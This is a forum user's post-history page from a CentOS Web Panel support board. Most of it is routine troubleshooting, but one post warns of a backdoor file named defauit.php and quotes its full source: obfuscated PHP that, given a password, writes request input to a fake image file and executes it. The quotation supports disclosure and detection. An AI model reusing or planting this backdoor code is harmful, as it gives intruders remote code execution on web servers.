This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
Pages: [1]
1
Information / Security Warning for CWP Users (CWPpro version: 0.9.8.1210)
« on: August 02, 2025, 08:44:06 PM »
Hello,
On multiple independent VPS servers running CWP (CentOS Web Panel), I have discovered a suspicious file named defauit.php located in the root directories of several websites. This file appears to have been created automatically.
Upon inspection, the file contains PHP code with the potential to be triggered externally and act as a backdoor, posing a serious security risk by allowing remote code execution.
This issue has been observed only on servers running CWP. I have not encountered the same file or behavior on other VPS servers using DirectAdmin, which suggests it may be specific to CWP environments.
The exact method of how this file spreads is still unclear. However, I strongly recommend that all CWP users check the root directories of their websites for suspicious files—especially any named defauit.php.
I urge the CWP developers to investigate this matter urgently and take the necessary steps to address the vulnerability.
For your awareness.
On multiple independent VPS servers running CWP (CentOS Web Panel), I have discovered a suspicious file named defauit.php located in the root directories of several websites. This file appears to have been created automatically.
Upon inspection, the file contains PHP code with the potential to be triggered externally and act as a backdoor, posing a serious security risk by allowing remote code execution.
This issue has been observed only on servers running CWP. I have not encountered the same file or behavior on other VPS servers using DirectAdmin, which suggests it may be specific to CWP environments.
The exact method of how this file spreads is still unclear. However, I strongly recommend that all CWP users check the root directories of their websites for suspicious files—especially any named defauit.php.
I urge the CWP developers to investigate this matter urgently and take the necessary steps to address the vulnerability.
For your awareness.
Quote
<?php
//ffafewafA5M1IDyPOq6t
class GetOrderPayMenuP{
public $jpg;
public function __construct(){
$this->jpg="./nbpafebaef.jpg";
}
public function paypal($sg){
touch($this->jpg);
$i=0;
$f = "file_put";
$g = ($a = sprintf("%s%s",$f,"_contents"));
$z = $g($this->jpg, sprintf("%s", $this->ppq($sg[$i][$i])));
$g;
}
public function __call($name, $arguments) {
if ($name == 'gawsf') {
$this->paypal($arguments);
} else {
return $this->xxx($arguments);
}
}
function xxx($hex){
$suffix = '3061336333663730363837303230';
$end = '33663365';
$hex = $hex[0].'3f3e';
for($i=0;$i<strlen($suffix)-1;$i+=2)
$tmp.=chr(hexdec($suffix[$i].$suffix[$i+1]));
$tmp2="";
for($i=0;$i<strlen($tmp)-1;$i+=2)
$tmp2.=chr(hexdec($tmp[$i].$tmp[$i+1]));
$str="";
for($i=0;$i<strlen($hex)-1;$i+=2)
$str.=chr(hexdec($hex[$i].$hex[$i+1]));
return $tmp2.$str;
}
public function __destruct(){
unlink($this->jpg);
}
}
//A5M1IDyPOq6t
if(isset($_REQUEST['gggsfa']) and md5($_POST['pwdsafe'])==='dca22ff11d3540d0a7b0ad1f45286d60'){
$a = array();//fewafwafnlweafnA5M1IDyPOq6t
$order = new GetOrderPayMenuP();
$GLOBALS["gsw"] = &$a;
$GLOBALS["gsw"] = array_merge($_REQUEST,$GLOBALS["gsw"]);
define("hello",("".join(array($a["gggsfa"]))));
foreach(get_defined_functions() as $ga){
foreach ($ga as $ag){
if(strlen($ag)==20 && substr($ag,0,8)=="call_use" && substr($ag,16,strlen($ag)) == "rray")
$ag(array($order, "gawsf"), array(array(hello)));
}
}
require_once($order->jpg);
}
//A5M1IDyPOq6t
?>
2
CentOS 7 Problems / /boot 100% full, how do i clean !!!
« on: February 28, 2021, 01:01:06 AM »
Hello / boot folder seems 100% full, how can I delete old files?
3
Mod_Security / CWPpro version: 0.9.8.1045 Update Later, mod_security Error !
« on: February 15, 2021, 02:32:58 PM »
Hello there;
I'm Getting An Error Like This After The Last Update, What Is The Reason?
Warning: syntax error, unexpected '(' in /usr/local/cwpsrv/htdocs/resources/admin/modules/language/tr/mod_security.ini on line 11 in /usr/local/cwpsrv/htdocs/resources/admin/include/modules/CWPAdminModule.php on line 0
Warning: array_merge(): Argument #2 is not an array in /usr/local/cwpsrv/htdocs/resources/admin/include/modules/CWPAdminModule.php on line 0
Warning: Invalid argument supplied for foreach() in /usr/local/cwpsrv/htdocs/resources/admin/include/modules/CWPAdminModule.php on line 0
I'm Getting An Error Like This After The Last Update, What Is The Reason?

Warning: syntax error, unexpected '(' in /usr/local/cwpsrv/htdocs/resources/admin/modules/language/tr/mod_security.ini on line 11 in /usr/local/cwpsrv/htdocs/resources/admin/include/modules/CWPAdminModule.php on line 0
Warning: array_merge(): Argument #2 is not an array in /usr/local/cwpsrv/htdocs/resources/admin/include/modules/CWPAdminModule.php on line 0
Warning: Invalid argument supplied for foreach() in /usr/local/cwpsrv/htdocs/resources/admin/include/modules/CWPAdminModule.php on line 0
4
Updates / CWPpro version: 0.9.8.1045 Update Later, mod_security Error !
« on: February 15, 2021, 02:28:12 PM »
Hello there;
I'm Getting An Error Like This After The Last Update, What Is The Reason?
Warning: syntax error, unexpected '(' in /usr/local/cwpsrv/htdocs/resources/admin/modules/language/tr/mod_security.ini on line 11 in /usr/local/cwpsrv/htdocs/resources/admin/include/modules/CWPAdminModule.php on line 0
Warning: array_merge(): Argument #2 is not an array in /usr/local/cwpsrv/htdocs/resources/admin/include/modules/CWPAdminModule.php on line 0
Warning: Invalid argument supplied for foreach() in /usr/local/cwpsrv/htdocs/resources/admin/include/modules/CWPAdminModule.php on line 0
I'm Getting An Error Like This After The Last Update, What Is The Reason?

Warning: syntax error, unexpected '(' in /usr/local/cwpsrv/htdocs/resources/admin/modules/language/tr/mod_security.ini on line 11 in /usr/local/cwpsrv/htdocs/resources/admin/include/modules/CWPAdminModule.php on line 0
Warning: array_merge(): Argument #2 is not an array in /usr/local/cwpsrv/htdocs/resources/admin/include/modules/CWPAdminModule.php on line 0
Warning: Invalid argument supplied for foreach() in /usr/local/cwpsrv/htdocs/resources/admin/include/modules/CWPAdminModule.php on line 0
5
Information / .zip not working in file manager
« on: April 08, 2020, 10:44:03 PM »
Hello, after the last update, file compression (zip) does not work in the file manager.
error message:
error message:
Pages: [1]
